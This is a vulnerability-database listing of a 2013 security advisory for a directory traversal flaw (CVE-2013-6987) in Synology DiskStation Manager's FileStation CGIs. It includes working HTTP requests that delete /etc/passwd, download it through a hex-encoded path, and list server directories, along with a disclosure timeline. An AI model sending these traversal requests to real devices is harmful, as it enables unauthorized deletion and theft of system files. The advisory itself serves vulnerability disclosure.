Synology DSM 4.3-3810 Directory Traversal

🗓️ 23 Dec 2013 00:00:00Reported by Andrea FabriziType

packetstorm🔗 packetstormsecurity.com👁 54 Views

Synology DSM 4.3-3810 Directory Traversal vulnerability allows authenticated users to access, modify system file

Reporter	Title	Published	Views	Family All 11
0day.today	Synology DSM 4.3-3810 - Directory Traversal	24 Dec 201300:00	–	zdt
CVE	CVE-2013-6987	31 Dec 201315:00	–	cve
Cvelist	CVE-2013-6987	31 Dec 201315:00	–	cvelist
NVD	CVE-2013-6987	31 Dec 201316:04	–	nvd
Prion	Directory traversal	31 Dec 201316:04	–	prion
Positive Technologies	PT-2013-6222 · Synology · Synology Diskstation Manager	31 Dec 201300:00	–	ptsecurity
securityvulns	CVE-2013-6955 Synology DSM remote code execution	27 Mar 201400:00	–	securityvulns
securityvulns	Synology DiskStation Manager code execution	27 Mar 201400:00	–	securityvulns
seebug.org	Synology DSM目录遍历漏洞	25 Dec 201300:00	–	seebug
Tenable Nessus	Synology DiskStation Manager < 4.3-3810 Update 3 Multiple FileBrowser Component Directory Traversal Vulnerabilities	5 Feb 201400:00	–	nessus

`**************************************************************  
Title: Synology DSM multiple directory traversal  
Version affected: <= 4.3-3810  
Vendor: Synology  
Discovered by: Andrea Fabrizi  
Email: [email protected]  
Web: http://www.andreafabrizi.it  
Twitter: @andreaf83  
Status: patched  
CVE: 2013-6987  
**************************************************************  
  
I'm again here with a Synology DSM vulnerability.  
  
Synology DiskStation Manager (DSM) it's a Linux based operating  
system, used for the DiskStation and RackStation products.  
  
I found a lot of directory traversal in the FileBrowser components.  
This kind of vulnerability allows any authenticated user, even if not  
administrative, to access, create, delete, modify system and  
configuration files.  
  
The only countermeasure implemented against this vulnerability is the  
check that the path starts with a valid shared folder, so is enough to  
put the "../" straight after, to bypass the security check.  
  
Vulnerables CGIs:  
- /webapi/FileStation/html5_upload.cgi  
- /webapi/FileStation/file_delete.cgi  
- /webapi/FileStation/file_download.cgi  
- /webapi/FileStation/file_sharing.cgi  
- /webapi/FileStation/file_share.cgi  
- /webapi/FileStation/file_MVCP.cgi  
- /webapi/FileStation/file_rename.cgi  
  
Not tested all the CGI, but I guess that many others are vulnerable,  
so don't take my list as comprehensive.  
  
Following some examples ("test" is a valid folder name):  
  
- Delete /etc/passwd  
===========================================  
POST /webapi/FileStation/file_delete.cgi HTTP/1.1  
Host: 192.168.56.101:5000  
X-SYNO-TOKEN: XXXXXXXX  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 103  
Cookie: stay_login=0; id=kjuYI0HvD92m6  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1  
===========================================  
  
- Arbitrary file download:  
===========================================  
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1  
Host: 192.168.56.101:5000  
Connection: keep-alive  
Authorization: Basic XXXXXXXX  
===========================================  
  
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd  
  
- Remote file list:  
=========================  
POST /webapi/FileStation/file_share.cgi HTTP/1.1  
Host: 192.168.56.101:5000  
X-SYNO-TOKEN: XXXXXXXX  
Content-Length: 75  
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2  
  
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1  
==========================  
  
Timeline:  
- 05/12/2013: First contact with the vendor  
- 06/12/2013: Vulnerability details sent to the vendor  
- 20/12/2013: Patch released by the vendor  
  
  
`

23 Dec 2013 00:00Current

EPSS0.30235